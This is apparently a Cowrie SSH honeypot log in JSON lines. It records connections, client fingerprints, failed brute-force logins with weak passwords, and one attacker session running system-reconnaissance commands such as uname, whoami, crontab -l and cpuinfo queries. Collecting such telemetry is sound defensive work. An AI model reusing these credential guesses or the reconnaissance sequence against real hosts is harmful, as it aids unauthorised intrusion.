{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:45.819146Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:46.676806Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:57:46.677515Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:46.887276Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:47.330722Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:57:47.331634Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:47.542205Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:48.023522Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:57:48.024527Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:57:48.025404Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:48.235663Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:48.718055Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:57:48.718819Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:48.927815Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:49.406171Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:57:49.406897Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:49.616518Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:50.097370Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:57:50.098151Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:50.307565Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:51.245323Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:57:51.246280Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:51.456774Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:51.894038Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:57:51.894763Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.104151Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:52.582078Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.582868Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.connect","src_ip":"207.154.232.101","src_port":6116,"dst_ip":"1.2.3.4","dst_port":22,"session":"15b9d93d9900","protocol":"ssh","message":"New connection: 207.154.232.101:6116 (1.2.3.4:22) [session: 15b9d93d9900]","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.691766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.706451Z","src_ip":"207.154.232.101","session":"15b9d93d9900"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.731789Z","src_ip":"207.154.232.101","session":"15b9d93d9900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:52.791848Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:53.275151Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:57:53.275904Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T13:57:53.410309Z","src_ip":"207.154.232.101","session":"15b9d93d9900"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:53.412576Z","src_ip":"207.154.232.101","session":"15b9d93d9900"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:53.485356Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:53.963080Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:57:53.963837Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:54.173457Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:55.072165Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:57:55.072844Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:55.282222Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:55.716654Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:57:55.717496Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:55.928105Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.closed","duration":"26.3","message":"Connection lost after 26.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:55.929541Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44970,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ddec526e3d1","protocol":"ssh","message":"New connection: 212.227.125.160:44970 (1.2.3.4:22) [session: 9ddec526e3d1]","sensor":"my-vps","timestamp":"2025-08-28T13:58:11.084221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:58:11.085366Z","src_ip":"212.227.125.160","session":"9ddec526e3d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:58:11.254745Z","src_ip":"212.227.125.160","session":"9ddec526e3d1"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"123123","message":"login attempt [ec2-user/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:12.069200Z","src_ip":"212.227.125.160","session":"9ddec526e3d1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:58:13.241187Z","src_ip":"212.227.125.160","session":"9ddec526e3d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49460,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac0ed1dacf6b","protocol":"ssh","message":"New connection: 212.227.125.160:49460 (1.2.3.4:22) [session: ac0ed1dacf6b]","sensor":"my-vps","timestamp":"2025-08-28T13:58:46.243685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:58:46.245991Z","src_ip":"212.227.125.160","session":"ac0ed1dacf6b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:58:46.411641Z","src_ip":"212.227.125.160","session":"ac0ed1dacf6b"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"111111","message":"login attempt [ec2-user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:47.095895Z","src_ip":"212.227.125.160","session":"ac0ed1dacf6b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:58:48.264526Z","src_ip":"212.227.125.160","session":"ac0ed1dacf6b"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":3990,"dst_ip":"1.2.3.4","dst_port":22,"session":"735c0a9dd999","protocol":"ssh","message":"New connection: 80.94.95.15:3990 (1.2.3.4:22) [session: 735c0a9dd999]","sensor":"my-vps","timestamp":"2025-08-28T13:58:49.821359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:58:49.822120Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:58:49.873469Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:50.170272Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd1234","message":"login attempt [user/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:51.245594Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.login.failed","username":"user","password":"ghbdtn","message":"login attempt [user/ghbdtn] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:52.299719Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc123","message":"login attempt [user/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:53.352478Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd123","message":"login attempt [user/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:58:54.405250Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:58:55.460847Z","src_ip":"80.94.95.15","session":"735c0a9dd999"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57268,"dst_ip":"1.2.3.4","dst_port":22,"session":"f78806babd13","protocol":"ssh","message":"New connection: 217.72.205.35:57268 (1.2.3.4:22) [session: f78806babd13]","sensor":"my-vps","timestamp":"2025-08-28T13:59:05.160567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:59:05.161783Z","src_ip":"217.72.205.35","session":"f78806babd13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42148,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c93a46991ee","protocol":"ssh","message":"New connection: 212.227.125.160:42148 (1.2.3.4:22) [session: 6c93a46991ee]","sensor":"my-vps","timestamp":"2025-08-28T13:59:20.892772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:59:20.904581Z","src_ip":"212.227.125.160","session":"6c93a46991ee"}
